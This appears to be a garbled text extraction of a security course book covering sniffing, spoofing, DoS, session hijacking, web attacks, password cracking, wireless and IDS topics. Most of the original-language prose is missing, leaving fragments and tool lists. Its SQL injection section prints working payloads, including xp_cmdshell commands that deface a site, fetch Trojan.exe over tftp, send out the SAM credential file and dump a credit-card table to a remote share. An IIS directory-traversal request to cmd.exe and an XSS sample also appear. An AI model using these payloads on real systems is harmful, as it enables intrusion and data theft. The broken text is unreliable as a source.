gateway . overwrite ARP cache
ARP spoofing
. enterprise port security MAC
address .

113

MAC Duplicating
MAC duplicating sniff MAC address
.
MAC address .
. MAC filtering
.

Capture Ethereal
Ethereal .
:

:ip.dst eq www.eccouncil.org www.eccouncil.org

.

:ip.src == 192.168.1.1 192,168,1,1 .

:eth.dst eq ff:ff:ff:ff:ff:ff broadcast 2 .

114

MAC Flooding
sniffer .
.
.
sniffer ARP spoofing : .flooding
ARP spoofing MAC address gateway
gateway sniffer .
flood .
sniffer
.

115

DNS Poisoning
(DNS poisoning) DNS poisoning DNS
. DNS
. URL
DNS IP . DNS
.

.
IP DNS IP
.
.
worm .

DNS poisoning :

:Intranet spoofing .

:Internet spoofing .

:Proxy server DNS poisoning DNS

.

:DNS cache poisoning DNS

.
116

:Intranet DNS Spoofing

LAN sniff . ARP
.

:Internet DNS Spoofing

DNS .
Internet DNS Spoofing .
.1 .
Treewalk .2 readme.txt IP Treewalk
DNS .
.3 dns-spoofing.bat IP .
.4 dns-spoofing.bat Jessica ) (chess.exe
.5 properties DNS
.
.6 Jessica DNS DNS .
.7 Jessica XSECURITY.com
sniff .

117

:Proxy Server DNS Poisoning

Rebecca proxy server Internet Explorer
. .

:DNS Cache Poisoning

DNS .
. DNS
. DNS
118

 DNS IP .
.

EtherFlood flood .
.
Dsniff .
urlsnarf msgsnarf mailsnarf filesnarf webspy .
.
Sshmitm webmitm man-in-the-middle SSH HTTPS .
dnsspoof Arpspoof macof
sniffer .
Cain & Abel
brute force VoIP
.
Packet Crafter TCP/IP/UDP .
flage .
SMAC MAC address MAC address
.
MAC Changer MAC address . MAC
MAC MAC MAC MAC
address .
WinDNSSpoof DNS ID spoofing .
sniff . ARP
spoofing flooding .
Distributed DNS Flooder DoS DNS .
119

 DNS .
:
SmartSniff MSN Sniffer Win Sniffer Ace Password Sniffer Effetech ArpSpyX Ettercap
AW Cloasoft EtherLook NetIntercept Etherpeek Snort EtherApe Ntop NetSetMan SMAC
URL Snooper BillSniff Sniphere NetResident Sniffem CommView Ports Traffic Anakyzer
.EtherScan Analyzer Ipgrab AnalogX Packetmon EtherDetect Packet Sniffer

.

. AES
RC4 RC5 VPN
. packet sniffer
. sniff SSH.
sniffer :

Ping method
ARP method
Latency method

IDS

120


netINTERCEPTOR .
.
sniffer .
Sniffdet sniffer TCP/IP Sniffdet .
promiscuous mode sniffer
.
Antisniff Promiscan ARP Watch Prodetect
sniffer .

121

Session Hijacking Denial of Service


DoS
.
.
) session hijacking ( . DoS
. session
hijacking .
session hijacking man-in-the-middle .

session hijacking DDoS DoS TCP

sequence number .
DoS session hijacking .

123

Denial of Service
DoS . DoS .
DoS (BOTs) robot robot
) (BOTNETs smurf SYN flooding DoS DDoS .

DoS
DoS : DoS ) DoS(
).(DDoS

. DoS :

:
.
DoS
. DoS
) .(DDoS

Jolt2 DoS IP .
.
Bubonic DoS TCP
.
124

 Ping of Death IP
Ping of Death .
.
SSPing ICMP
.
A LAND Attack IP IP .
loop
.
CPU Hog DoS CPU
.
WinNuke 139 IP
. (OOB) Out of Bounds
) (buffer overflow .
Targa DoS .
.
RPC Locator .
DoS DoS .

DDoS BOT BOTNET

.
DoS DDoS .
DDoS
DDoS DoS . DoS DDoS
. DDoS
.
125


Trinoo UDP DDoS Trinoo master .
DoS Master . agent
) daemons ( ) (
IP . Trinoo agent . daemon
buffer overflow WinTrinoo . Trinoo
Trinoo.
Shaft Trinoo UDP master agent .
flood
Shaft . ICMP UDP TCP flooding.
Stacheldraht TFN UDP flood ICMP flood TCP SYN
. telnet ) ( agent
) ( . .

126

) Tribal Flood Network (TFN ) bandwidth-depletion

( ) resource-depletion ( . UDP
TCP SYN ICMP flooding flooding smurf TFN2K . TFN
TFN2K .
IP spoofing ) (transport UDP
TCP ICMP .
Mstream TCP ACK flag handler
agent handler .

zombie BOT .
.
IP .

DDoS :

Master/ Handler
Slave/ secondary victim/ zombie/ agent/ BOT/ BOTNET
Victim/ primary victim
master slave . master Vitim .

master . slave .

127

 DDoS . intrusion
DDoS slave . attack
slave .

:DDoS

128

 BOT BOTNET
BOT ) (web robot .
)spammer( BOT
. BOT .
BOTagent . web crawler )spider(
.
BOT
. BOT IRC
. BOT
... .
BOTNET BOTBOTNET . DDoS
SMTP
. BOTNET
DDoS BOT .

129

 smurf
smurf ICMP IP
broadcast . ICMP
. broadcast
. DoS ping flood.
IRC smurf .

SYN flooding
SYN flood TCP
. SYN
130

 IP . IP ) (spoofed
TCP .
" "
. SYN flood SYN cookies :
Micro Blocks RST cookies .Stack Tweaking

DoS DDoS
DoS .
:
:network-ingress
network-ingress .
.
:rate-limiting
. traffic shaping .
: slave master agent
.
.
. IDS TFN Trinoo Stacheldraht
signature .
:Host-auditing
DDoS .
:Network-auditing agent DDoS
.
:
.

131


Find_ddos DoS
.
SARA .

.
RID TFN Trinoo Stacheldraht .
Zombie Zapper zombie ) (sleep
. .

Session Hijacking
Session hijacking
Session hijacking . ID
Session hijacking . sequence number
.
132

 Spoofing Hijacking
spoofing hijacking . spoofing
spoof
) (.

hijacking .

) (.

133

 Session hijacking :
: sequence number .
: RST FIN
.
: TCP sequence number
.

session hijacking
Session hijacking : .
.
sequence number TCP .

.
.
.

134

 :TCP
TCP . TCP ACK
sequence number . TCP session hijacking .
TCP :
.1 . SYN sequence number
) (ISN .
.2 SYN ISBN ACK
sequence number .
.3 ACK sequence number.
timeout flag FIN RST .
RST
. FIN
. FIN
RST .

sequence
TCP .
(SN) sequence number .
.
sequence number .
TCP SYN . synchronizing
sequence number ) (ISN ISN .
4 .
ACK sequence number
. sequence number
. 1 .
) 45
ACK sequence number 45 (.
135

 sequence number TCP

:

session hijacking sequence number .

TCP sequence prediction sniff .
sequence number .
.

136

 sniff sequence number .

session hijacking
sequence number .
IP ) (spoofed
. sequence number .
. flood ) (
RST .

session hijacking
session hijacking :
: sequence number .
: TCP RST FIN
. DoS .
: TCP sequence number
.
137

 :session hijacking

Network Level Hijacking

Application Level Hijacking

TCP/IP Hijacking
TCP/IP hijacking
.
. .
.

138

RST Hijacking
RST hijacking (reset) RST . ACK number
. reset
.

Blind Hijacking
TCP
) (source routing .
.

Juggernaut sniffer (hijack TCP session) TCP .

"" .
hijacking .
Hunt Hunt .
ARP spoofing MAC address
TCP .
139

 TTYWatcher session hijacking

. Sun Solaris.
IP Watcher ) (Session hijacking
.
.
T-Sight .

T-Sight . .
Remote TCP Session Reset Utility TCP IP
. TCP .

session hijacking
TCP session hijacking .
TCP/IP .
Session hijacking
ISN sequence number .
sniff .
session hijacking :

session hijacking .

140

 session hijacking
session hijacking .
.IPSec
.
.
SSH SSL.
session hijacking
) (remote
.
VPN .
.

.
Session hijacking :

141


.
.
.
.
.

24 7
.
.

. patch
.

.
:

) Apache IIS (...

143

DMZ
.

) defacement ( .
deface Deface .

. .
deface :

administrator man-in-the-middle

administrator brute-force

DNS

FTP e-mail

)(permission

) SQL injection SQL (

Telnet SSH

URL poisoning

extension

144

IIS Unicode Exploit

2000 IIS directory traversal
Unicode exploit . IIS

directory

traversal/Unicode exploit 2000 patch

CGI ISAPI ASP .
)( IIS parser .
) (universal .
. IIS
. %c0% af
IIS . ASCII " "%2E ""%co%af
. HTTP IIS :
GET/scripts/..%c%af../winnt/system32/cmd.exe?/c+dir=c:\ HTTP/1.0
.
Unicode Directory Traversal IIS 4 5 URL


backdoor .

IIS Unicode exploit

.

145


N-Stalker Web Application Security Scanner
buffer overflow SQL injection cross-site scripting parameter-
tampering .
Metasploit framework .
.
.
.
IISxploit.exe directory traversal exploit IIS
Unicode string .
) ASP Trojan (cmd.asp
. backdoor
.
CleanIISLog log IIS IP .
W3SVC IP
ServerMask SAINT Vulnerability Scanner CORE IMPACT :
.Neosploit MPack LinkDeny HTTPZip CasheRight ServerMask ip100

146

 patch
hotfix .
. hotfix service
pack . pacth patch .
patch patch . patch
. patch patch
Microsoft St. Bernard PatchLink
patch . UpdateExpert :
.HFNetChk Qfecheck

:
: www.securityseers.com
: Nessus Security Scanner Snort .Nmap
: XVScan SANE .Parallel Port

Whisker
.

147

 :
N-Stealth HTTP Vulnerability Scanner
WebInspect
Shadow Security Scanner
SecureIIS
ServersCheck Monitoring
GFI Network Server Monitor
Servers Alive
Webserver Stress Tool
Secunia PSI

.
:

administrator

Default web site default FTP site

WebDAV

) directory browsing (

patch

buffer overflow ...

("File not found") 404

logging auditing

80 443

GET POST

148

 cross site scripting "<" ">" , " "&lt

" "&gt

Patch update:
MBSA

Auditing :logging

failed logon attempts log

log IIS

:Script Mapping

Extension 404.dll ).shtml .ida .htw .idq

(.printer .htr .idc .stm

WebDAV

NetBIOS ) SMB 139 138 137 (445

quest

administrator

Administartor
149

:ISAPI Filters

ISAPI

NTFS

NTFS

IUSER COMPUTERNAME deny

:IIS Metabase

NTFS metabase

Share:

share C$) administrator (Admin$

80 443

.
.
. google hacking .

150



.
.

/
. .

.

.

.
.
.

.
:
. :
151


. :
:Cross-site scripting
cross-site scripting .
.
.
:XSS XSECURITY )( .

> www.xsecurity.com/default.asp?name=<script>evilScript()</script .
.
XSECURITY ><script>evilScript()</script
. HTML .
.
. XSECURITY
.

152

 ) (validate

XSS .

:SQL injection SQL . SQL

URL .
.
SQL Injection .
.
:Command injection .
. python Perl ...
.
) (langiage-specific libraries .
:Directory traversal/Unicode windows explorer
. .
patch hotfix .

153

 :Cookie poisoning and snooping poisoning .

.
.

) (timeout

IP

logout

:Buffer overflow
. .
) Java (J2EE .

StackGuard ) StackShield
( .
:Authentication hijacking .
SSL .
Cookie Cryptographic interception Parameter/form tampering :
Platform Obfuscation application Error message interception attack Log tampering snppong
Zero day Web services attacks Security management exploits DMZ protocol attacks exploits
Network access attacks attack .TCP fragmentation

154


Instant Source HTML
. toolbar IE
.
Wget
.
.
WSDigger SQL injection
cross-site scripting .
dotDefender :
Patch Traversal Header Tapmering Cross-site Scripting Proxy Takeover SQL Injection
.Probes

Burp .
man-in-the-middle .
WebSleuth spidering .
.

155

 WebWatchBot IP Ping
Port FTP POP3 SMTP HTTPS HTTP DNS .
.
BlackWidow
.
Parosproxy WebScarab Watchfire AppScan Ratproxy Mapper :
AppScan AccessDriver Falcove NetBrute Emsa Web Monitor KeepNI

Acunetix Web

.Scanner

Google Hacking
Google hacking
. http://johnny.ihackstuff.com Acunetix Web Vulnerability Scanner
google hacking .
password medical records .
.

.
. .

156


.
HTTP . HTTP basic : .digest basic
digest
challenge-response hash .

token-based certificate-based NTLM

. NTLM Internet explorer IIS
NTLM
. 2000 2003 Kerberos
. ) (certificate-based X.509 /
. SecureID 60
.

157


.
PIN

.

158

 :
.

:
.

.

:
.
.

159

shoulder surfing

microsoft1

msoftmsoft

tfosorcim

io

qwerty asdf

e z3ro10v3 L 3 i 1 o 0

) (.pwl

Kerberos

160

" : "james8

" :"samatha

" :"superstitious

" :"sUperStiTIous

" :"obiwan

" :"spicer

" :"qwertyuiop

.
dictionary brute-force .
.
backdoor .
sniff .

dictionary attack
.
. hash
. hash ) (
SAM .
161

 brute force .

.

:
:
:Dictionary .
:Brute force .
:Hybrid .

Cain & Abel
dictionary brute force .
ARP .
) Lophtcrack (LC4
.
John the Ripper .

162

 Gammaprog POP3 .
MessenPass Yahoo Messanger MSN Messanger
Google Talk .
Password Spectator .
.
Webcracker . " HTTP
"302 object moved .
.

Munga WebCracker RAR Hydra Authforce Obiwan Brutus :

WWWhack RockXP Wireless WEP Key Password Spy SnadBoy PassList Bunga
Advanced Mailbox Password Recovery Atomic Mailbox Password Cracker Passwordstate
Messenger Key Mail PassView Networl Password Recovery .SniffPass
Password Administrator WebPassword :
PassReminder Easy Web Password Password Safe .My Password Manager

163

Buffer Overflow SQL Injection


SQL injection Buffer overflow
) (input box .
URL
.
SQL injection Buffer overflow :
) .(invalid
.
shell .

SQL Injection
SQL injection
shell . SQL server
. Cmd .
.
SQL server .
SQL server .

165

 SQL Injection SQL

. SQL .
SQL
. SQL injection
SQL .

SQL injection
SQL injection
. SQL server :
.1
)
" .("I forget my password POST
GET . POST URL
. . GET
POST > <Form :
><Form action=search.asp method=post
><input type=hidden name=X value=Z
></Form
CHI JSP ASP PHP URL
:
http://www.xsecurity.com/index.asp?id=10
:
http://www.xsecurity.com/index.asp?id=blah' or 1=1
166

 SQL server .2 )' '( .

. ' 'a'='a )
( SQL injection . )'(
SQL Injection .

.3 SELECT INSERT
.

167

 SQL Server
SQL
:
)'( :
Blah' or 1=1
Login: blah' or 1=1
Password:: blah' or 1=1
http://search/index.asp?id=blah or 1=1
SQL Injection :
'or 1=1 -"or 1=1 -or 1=1-' or 'a'='a
" or "a"="a
)') or ('a'='a
)") or ("a"="a

.
SQL server .
SQL .
SQL :
:
Blah;exec master..xp_cmdshell dir c:\*.* /s >c:\directory.txt--

168

:
Blah;exec master..xp_cmdshell echo hacker-was-here > c:\hacker.txt-: IP ping
Blah;exec master..xp_cmdshell ping 192.168.1.1-:( write )
Blah;exec master..xp_cmdshell echo you-are-defaced >
c:\inetpub\WWW.root\index.htm"-:( )
Blah;exec master..xp_cmdshell cmd.exe /c appname.exe"-:
Blah;exec master..xp_cmdshell tftp -i 10.0.0.4 GET Trojan.exe
C:\trojan.exe"-:
Blah;exec master..xp_cmdshell tftp i 10.0.0.4 put
C:\winnt\repair\SAM SAM" - . sp_makewebtask HTML
: creditcard
Blah';EXEC master..sp_makewebtask "\\10.10.1.4\share\creditcard.html",
"SELECT * FROM CREDITCARD"
: SQL injection
SQLPoke Database Scanner AppDetective SQL2.exe SQLSmack SQLbf SqlExec SQLDict
.SQLPing v2.2 NGSSQuirreL NGSSQLCrack

169

Blind SQL Injection

: SQL .
.

SQL injection
) (syntax SQL . SQL
. JDBC
ADO .

SQL Injection
SQL injection
sa administrator .
)
SQL server ( . admin .
.
:

)(single quota

170

 SQL injection :

Acunetix Web Vulnerability Scanner

SQL .

)( gets() bcopy() sprint() strcpy() strcat )( scanf

171

 Buffer Overflow
Buffer overflow .
SQL injection .
shell .
buffer overflow .

overflow .
. 32
. NT .

):(Stack
LIFO ) .(last in first out
. ) (release.

172

:Heap
Heap
. malloc .

buffer overflow stack-based : Stack .heap-baesd heap

. stack heap
. )stack( heap
Buffer overflow .
heap overwrite .
shell Cmd .
173

 buffer overflow
.

)(stack-based buffer overflow

Buffer overflow ) (stack-based
. . overwrite
. C
) ( .

:
.1 ) (stack .
.2
.
overwrite .
.3
. overwrite
.

174

 buffer overflow
.
: ) (overwritten EIP .

(heap-based overflow) heap

) )( (malloc heap .
heap overwrite
.

heap overwrite.

) (Shellcode stack-based overflow .

.
.

175

 buffer overflow
: .
.
) (string . .

. segmentation . overwrite
.
.

buffer overflow
buffer overflow
. .
(No Operation) NOP padding
NOP . .
IDS NOP
. IDS NOP
.x++ , x--;?NOPNOP buffer overflow
IDS .
C C++ )( strcat() strcpy )( streadd
buffer overflow .
buffer overflow .
176

 buffer overflow
RAD patch
.
buffer overflow .

Libsafe Insure++ Valgrind Immunix System StackGuard

buffer overflow .

177


. broadcast

.
) (WLAN IEEE 802.11
802.11b 802.11a 802.11n . 802.11
. 802.11i 802.11 . Wi-Fi
WPA WPA2
802.11 802.11i .
IEEE Wi-Fi .

:802.11 DSSS FHSS Infrared .
:802.11a
:802.11b WiFi
:802.11g 802.11b
:802.11i
:802.16
:Blutooth
:900MHz
179


:
. omni : .directional
:Access Point .
.
:SSID
SSID . .
access point . SSID
.

WEP WPA
access point :
) (open system ) .(shared key
. WEP
.
WEP WEP .
.
WEP 64 128 . WEP
40 104 24 (Initialization Vector) IV
WEP 64 128 .
RC4 IV WEP : WEP
. FMS .
WEPCrack AirSnort aircrack WEP
. brute force WEP
FMS.
180

 WPA IEEE 802.11i .

TKIP WPA Personal WPA Enterprise
RC4 WPA Personal . ASCII
WPA Enterprise RADIUS Server WPA Enterprise .
RADIUS Server TKIP . rotate
WEP .
WPA2 802.11i AES AES .
WPA2 . TKIP
mixed mode security Mixed mode .
TKIP AES . AES
PDA TKIP WPA Personal .
WPA2 Personal WPA Enterprise .
WPA2 Enterprise RADIUS Server 802.1X EAP
. 802.11i WPA2 WPA2 .

181

IEEE 802.11

WEP

WEP

IV WEP

WPA

TKIP

RADIUS

WPA2

AES

IEEE 802.11i

AES

)(802.1x/EAP
RADIUS
)(802.1x/EAP
RADIUS
)(802.1x/EAP

:WarWalking
:Wardriving

:WarFlying
:WarChalking chalk

:Blue Jacking

:GPS

182


Aircrack WEP .
Aircrack .
.
WEPCrack AirSnort .
NetStumbler Kismet . SSID MAC address
. Kismet SSID
IDS .
WEPdecrypt WEP dictionary attack key generator.
CowPatty WPA-PSK brute force.

SSID MAC spoofing

.
hotspot access point
.
POP3 FTP SMTP .
SSID beacon .
SSID . SSID beacon
. access point SSID .
SSID .
MAC filtering .
MAC address access point . MAC
filter scaleable access point .
MAC spoofing MAC filtering . MAC
MAC address .
183

 MAC Address XP
:
HKEY_LOCAL_MACHINE > System > CurrentControlSet > Control
class } {4D36E972-E325-11CE-BFC1-08002bE10318
. XP
. Edit New String Values .
NetworkAddress . Modify MAC .
Address OK . MAC Address
.

SMAC MAC spoofing .

) Rogue Access Point(

Access pointaccess point
. access point . access point
access point . access
point access point
.
access point .
access point NetStumbler : .MiniStrumbler

184


ClassicStumbler access point .
AirFart .
Hotspotter .
ASLEAP AP Radar : .Cain & Abel

:
: WEP
WPA LEAP .
.
: hotspot.
DoS :DoS Access Point
access point access point .
DoS LLC ) deauthentication (death
.
AP masquerading access point :spoofing SSID
access point .
:MAC spoofing MAC address
MAC filtering .
access point .
.
185


NetStumbler .
kismet NetStumbler
. Access
point SSID ... . monitor mode
Airdump capture Airdump . SSID
capture . Aircrack
. WEP
WireShark
POP FTP Telnet.

186

:
AP Scanner StumbVerter WaveStumbler Mognet MacStumbler PrismStumbler Kismet
Wifi Finder AirTraf Wireless Security Auditor .eEye Retina WIFI
:
EtherPEG vxSniffer Aerosol VPNmonitoral WireShark NAI Wireless Sniffer AiroPeek
.ssidsniff WinDump DriftNet

. OSI .

187

 2 :

WPA
WPA2
802.11i

3 :

IPSec SSL VPN

7 :

HTTPS SSH .FTPS

:MAC Filtering MAC Address

.

SSID :SSID .

: .

access point broadcasting .

Access point .

DHCP IP .

access point .

access point .

Firmware .

.SSL

access point IP .

VPN .

188


IT
.
IDS .
" " .
tape keylogger
access point .

) (.

.
.
.

.

.
190

 .
.
:

keylogger backdoor rootkit

access point

) (

:
:
. CCTV
. . tape
.

) (lock .
. ...
: IDS spyware
.
191

 :
.

) (
.
.

. :

192

.
.

.
:

o
o
o
.

) ((BCP) business continuity plan ) disaster

((DRP) recovery plan .

193

: .
.

:
:
o ...
o
o
o
194

: .
:
o
o
o ) (boot floppy CD-ROM

o DOS DOS
.

: .
. :
o
o
o
o
195

Access point : access point

. :
o WEP
o SSID
o access point
o

:
:
o ) (auto answer
o

196

: .
:
o
o
o
o

: .

wiretap : .
.
) (shilded .

197

:
.
.
.
.

:
. (www.sentryinc.com) CyberAngel (www.ztrace.com) Ztrace Gold :
.(www.computrace.com) ComputracePlus .
: :
GPS . ...
.

198

 :DeviceLock
.

199



. distribution .
.
Mandrake RedHat Debian SUSE Gentoo Knoppix.

.
.
.

. .
jove pico ex vi .GNU emacs
vi .
emacs .
GNU
. GNU BSD
. GNU BSD .

. )(job control
201

 .
MS-DOS.
. . C
) (csh C . (sh) classic Bourne .

.
GNU Bash Bash ) job
(control .
tcsh C . small Bourne zsh
BSD's ash ksh likne shel .rc

256

:touch file.txt file.txt

] :cat [file
10 :head file.txt . 25 head -25 file.txt

10 :tail file.txt . 25 tail -25 file.txt

:cp file newfile
:mv file newfile
] :mkdir [directoryname
202

 :rm file
:ls dir
:pwd
:arp IP
:ifconfig
:netstat
:nslookup IP
:ping
:w session
:ps
:route
:shred overwrite
:traceroute
:adduser user1
:password user1 user1

203

 :
:bin )(

:sbin ) (

:etc

:include include

:lib

:src

:doc

:man ) manual(

:share

.
.
.
.
CD .
.
.

backdoor . .
ftp.kernel.org

:
.1 /usr/src
. tar zxf .
.2 . /usr/src/Linux make
menuconfig .
. menu .
make dep; make clean .
204

 .
. clean
.
.3 make zImage make modules
.
.4 . /boot
:
cp /usr/Linux/src/arch/i386/boot/zImage/boot/newkernel
.5 make modules_install . /lib/modules
.
.6 /etc/lilo.conf :
image = /boot/newkernel
label = new
read-only
.7 lilo .
lilo.conf .
Linux live CD . CD
.
CD live www.distrowatch.com
CD . CD .

205

 GCC
GCC ) (command-line .
http://gcc.gnu.org . C++ C
.
C++ GCC :
g++ filename.cpp o outputfilename.out
C GCC :
gcc filename.c o outputfilename.out

) (LKM
. LKM rootkit LKM
. LKM .
LKM rootkit Adore Knark : .Rtkit
rootkit . LKM /tmp
/var/tmp
. LKM rootkit
. LKM modprobe LKM.

.
:

cfengine cdrecord bugzilla bind balsa Appache

fileutils fetchmail (many) exim evolution ethereal (many) cvs cups Cron
206

kernel kerberos KDE iproute inetd hylafax gzip gnupg glibc ghostscript Gdm

openssh MYSQL mutt mplayer mpg123 mozilla man mailman lynx lsh Lprng
openssl
sendmail screen samba rsync python proftpd PostgreSQL postfix PHP pine Perl

xpdf xinetd XFree86 xchat wu-ftpd wget webmin vim tcpdump sudo stunnel snort
zlib
IP
. 65535 TCP
UDP ) 131070(
.

Nmap .
.
:Nessus
.
Nessus .

Xcrack
.

.
.

207


) (hardening .
.
.
.

.
null /etc/shadow .
deny all
. deny all .
deny all .
:
Cat "All:All>> /etc/hosts.deny

/proc filesystem /etc/sysctl.conf .

patch .
.

208

IP tables

)(HIDS

)(IPTable
IPTable ipchains .
statful . :
iptables A INPUT s 0/0 i eth0 d 192.168.1.1 p TCP j ACCEPT
eth0 IP
IP 192,168,1,1 .
iptables A OUTPUT p icmp icmp-type echo-request j ACCEPT
(ping) ICMP echo-request
ICMP .

(Security Auditors Research Assistant) SARA
. MAC OS.
Tcpdump .
ping .
Snort .
syslog .
209

 Netcat
TCP UDP .
.

SAINT SATAN .
) (check ) ( .
:Wireshark
.
:
Hunt LIDS IPTraf LSOF Nemesis Sniffit Hping2 Abacus Port Sentry . ...

210

IDS honeypot


) (IDS honeypot
. ) (IDS
.
honeypot
.
.

signature
. IDSpacket sniffer
. event IDS pager
.
) (IPS ... .
IPS .
) (IDS :
:Host-based ) (HIDS

. agent Norton Internet Security Cisco Security .
: worm HIDS .
212

 :Network-based ) (NIDS
.
.

malware . . IDS
.

IDS

Snort HIDS
. Snort IDS snort.conf .
snort :
Snort l c:\snort\log c C:\snort\etc\snoft.conf A console
BlackICE
. ) ( .
IDS .RealSecure Lucent RealSecure eTrust Internet Defense Dragon Sensor :
213

 ) (IDS signature analysis anomaly detection

. signature signature
Signature .
. IDS
phf CGI . anomaly detection

.

IDS signature
. UDP TCP HTTP ICMP
. IDS
. session plicing .

.

IDS :

IP

) (
214

 event.log . SNMP Tivoli

) IP IP (

TCP TCP FIN TCP RST

IDS
) (patern matching
.

IDS .

ADMutate .
signature IDS .
Fragrouter Stick Mendax SideStep : .Anzen NIDSbench

.
) (perimeter ) ( .
.

215

rule

:Packet filters network OSI .

rule . IP
216

 .
performance . packet filtering .

:Circuit level gateways session OSI . TCP handshaking

. circuit-level
gateway gateway .
. .

:Application level gateways gateway

application OSI . application-level gateway
web proxy telnet gopher FTP ...
application http:post get .

:Stateful multilayer inspection firewalls

. network OSI
application .
.
) ( Firewalking Port Scanning

Banner Grabbing Firewalking .

. Banner Grabbing
.
.
Telnet FTP Web .

telnet

mail.targetcompany.org 25 SMTP banner grabbing.

. 80
.
.
.
80
. reverse WWW shell .

217

 80

HTTP
.
covert ICMP
. covert TCP
) (acknowledgment.

007 Shell shell-tunneling covert
.
ICMP Shell Telnet ICMP
) ( .
AckCmd / TCP ACK
.
Covert_TCP
IP .

Traffic IQ Professional
.
:
Application layer firewalls
Intrusion Detection Systems
Intrusion Prevention Systems
Routers and Switches

218

 TCPOpera IDS .
Firewall Informer
. BLADE
) SAFE (
.
Atelier Web Firewall Tester
. 6 HTTP
.

Honeypot
honeypot DMZ
Honeypot .
IP .
. honeypot
DMZ . honeypot
.

219

 honeypot

Honeypot ) :(Low-interaction Honeyd Specter .KFSensr

Honeypot )(Medium-interaction

Honeypot ) :(High-interaction Honeynets

:honeypot

False positive

false negative

IPv6

honypot ) (high-interaction

honeypot
Honeypot DMZ .
. honeypot

220

 honeypot anti-honeypot
honeypot .
honeypot .
anti-honeypot honeypot honeyd ...
.

Honeypot open source :

Honeypot :

KFSensor
NetBait
ManTrap
Spector

Joneypot :open source

Bubblegum
Jackpot
BackOfficer Friendly
Bait-n-Switch
Bigeye
HoneyWeb
Deception Toolkit
LaBrea Tarpit
Honeyed
221

Honeynets
Sendmail SPAM Trap
Tiny Honeypot

Specter honeypot
.
Honeyd honeypot
.
KFSensor HIDS honeypot
.
Sebek honeypot .

Honeypot
Honeypot IP high-
interaction .
Honeypot . honeypot
. honeypot
IP honeypot .

Send-Safe Honeypot Hunter honeypot honeypot .
Nessus Vulnerability Scanner honeypot .

222


.
) (clear text ) (cipher text .
.
. .
.

.

. .
) substitution
( ) transposition ( .
substitution transposition . .

224


.
.

.
.

:
.

.
.

.
.

225

 RC5 RC4 SHA MD5 Blowfish

40 448 .
. 40 brute-force 1,4 0,2
. 64 50 37
. 256
.

RC5 RC4 SHA MD5 Blowfish

.
:MD5 hashing 128
. .
MD5 .
:SHA 160 SHA . MD5
SHA . .
RC4 RC4 :RC5 streaming cipher
RC4 . RC5 .
RC5 . RC5 .
256 .
blowfih :Blowfish cipher 64
. stream cipher 32 448 .

SSH
SSH .
telnet SSH2 . SSH SFTP.
226

 40 . 56
. 64
. 128 .
256 .

Advanced File Encryptor

. 256 AES
.
Command Line Scriptor
. .
227

 PGP ... .
.

Encrypt Encrypt Easy Encrypt PDF Encryption Engine :

ABC Omziff Alive File Encryption Advanced HTML Encrypt and Password Protect My Folder
.Command Line Scriptor CrypTool SafeCryptor CryptoForge EncryptOnClick CHAOS

PGP Crack brute force PGP.
Magic Lantern .
keylogger
.

228


.
:
.
) (Pen tester
.

Pen tester .
.
.
IP
.
.

.
. .

.
230


: .

.
.
.
.
outsource .
.
. 10 DMZ .
SLA .

.
.
.

.

)(pre-attack

)(attack

)(post-attack
231

 . .
DNS Whois
) ( .
IP Whois
.
...

. :

. ) (exploitive )(responsive

. .
:

) :(perimeter ) (ACL
FTP SSH Telnet . buffer
232

 DoS SQL injection overflow ... .

.
: :

:Input Validation LDAP SQL injection script injection OS command injection

injection .cross site scripting

:Output Sanitization .

:Access Control
...

:Checking for Buffer Overflow heap overflow stack overflow format

string overflow.

:Denial of Service DoS

.

:Compnent Checking
.

:Confidentiality Check
.

:Session Management
SSL SSL history cashe .

: .
CORE IMPACT
. brute-force
.
:
.
administrator .

233

 : .
. ) (leaving a mark
.
.
.


.
.

.

.
:

) (NDA

2006
:
:Nessus 11000 .
/ GTK
.
234

 :GFI LANguard .
IP .
patch
... .
:Retina . Nessus
.
:CORE IMPACT
) ( .
.
:ISS Internet Scanner .
1300
... .
:X-Scan .
username .
:SARA SATAN .
.

:QualysGuard .
. 5000 .
:SAINT .
235

 :MBSA MBSA.
3 .
:
:Metasploit Framework .
:Canvas 150 .

. :

236